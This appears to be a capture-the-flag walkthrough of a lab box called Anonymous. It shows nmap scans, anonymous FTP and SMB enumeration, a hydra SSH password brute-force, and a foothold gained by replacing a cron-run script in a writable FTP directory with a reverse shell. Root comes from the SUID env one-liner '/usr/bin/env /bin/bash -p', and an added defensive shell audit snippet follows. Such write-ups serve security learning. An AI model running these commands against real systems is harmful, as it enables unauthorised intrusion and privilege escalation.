Port scanning

sudo nmap --min-rate 10000 -p- 10.10.55.65
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-28 11:30 UTC
Nmap scan report for 10.10.55.65
Host is up (0.27s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 13.06 seconds
sudo nmap -sT -sV -sC -O -p21,22,139,445 10.10.55.65
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-28 11:30 UTC
Nmap scan report for 10.10.55.65
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.38.245
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open microsoft-ds Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-11-28T11:31:10
|_ start_date: N/A
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2023-11-28T11:31:10+00:00

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.00 seconds

Anonymous FTP login

Given the room's name, it is a reasonable guess that anonymous FTP login is allowed, and sure enough it is.

ftp 10.10.55.65
wget -m --no-passive ftp://anonymous:anonymous@10.10.55.65

This mirrors and downloads all of the files directly.

One script is found:

#!/bin/bash

# Cleanup script found in the FTP "scripts" directory, reproduced as found.
tmp_files=0
echo $tmp_files
# Note: "$tmp_files=0" expands to a single non-empty word, so this test is
# always true and the else branch is never reached.
if [ $tmp_files=0 ]
then
    echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log
    done
fi

For now, though, this script does not look useful.

SMB scanning

smbmap -H 10.10.55.65


SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.55.65:445 Name: 10.10.55.65 Status: Authenticated
Disk        Permissions  Comment
----        -----------  -------
print$      NO ACCESS    Printer Drivers
pics        READ ONLY    My SMB Share Directory for Pics
IPC$        NO ACCESS    IPC Service (anonymous server (Samba, Ubuntu))

A share named pics is found.

smbclient //10.10.55.65/pics

It also allows anonymous access; it contains two pictures, which are all downloaded, but they are of no use either.

Enumeration with enum4linux -a also works and turns up a user, namelessone.

Getting a shell

hydra -l namelessone -P /usr/share/wordlists/rockyou.txt ssh://10.10.55.65

First, try brute-forcing this user's password; as expected, this does not succeed.

Looking at the room hints, the log file obtained earlier from FTP seems to be the lead: although we cannot exploit the script by executing it ourselves, we can upload a reverse shell with the same name to replace it and have it executed, because it is run by a scheduled task.

Start a listener, upload the reverse shell, and a shell comes back.
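As an added, defender-side example that is not part of this writeup, the following POSIX sh functions check for the condition abused above (a script run by cron whose file or directory is group- or world-writable) and show why the cleanup script's own [ $tmp_files=0 ] test can never take its else branch. It assumes a Linux/BSD ls -ld mode string; every path it is run against is a constructed fixture.

```sh
#!/bin/sh
# Added example, not from the original writeup: audit a cron-run script for
# the weakness that gave the foothold above. Paths are constructed fixtures.

# perm_string PATH -> the 10-character mode string, e.g. "drwxrwxrwx"
perm_string() {
    ls -ld "$1" | cut -c1-10
}

# writable_by_others PATH -> "yes" if the group- or world-write bit is set
# (6th or 9th character of the mode string is 'w'), otherwise "no"
writable_by_others() {
    case "$(perm_string "$1")" in
        ?????w*|????????w*) echo yes ;;
        *) echo no ;;
    esac
}

# cron_script_risk SCRIPT -> "replaceable" when a non-owner could swap the
# script (the file itself or its directory is group/world writable), else "ok".
# A 777 directory exposed over anonymous FTP, as in the nmap output above,
# is exactly this case even when the script file itself is not writable.
cron_script_risk() {
    script=$1
    dir=$(dirname "$script")
    if [ "$(writable_by_others "$script")" = yes ] ||
       [ "$(writable_by_others "$dir")" = yes ]; then
        echo replaceable
    else
        echo ok
    fi
}

# The cleanup script's test `[ $tmp_files=0 ]` passes one non-empty word to
# test(1), which is always true, so the else branch never runs. The fixed
# form separates the operator with spaces and quotes the variable.
broken_compare() { tmp_files=$1; if [ $tmp_files=0 ]; then echo true; else echo false; fi; }
fixed_compare()  { tmp_files=$1; if [ "$tmp_files" = 0 ]; then echo true; else echo false; fi; }
```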

Privilege escalation

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Go straight for SUID binaries; env is among them, so following GTFOBins:

/usr/bin/env /bin/bash -p

That escalates straight to root.

Closing thoughts

I have not done a box in a long time, so an easy one was a good way to get back into practice.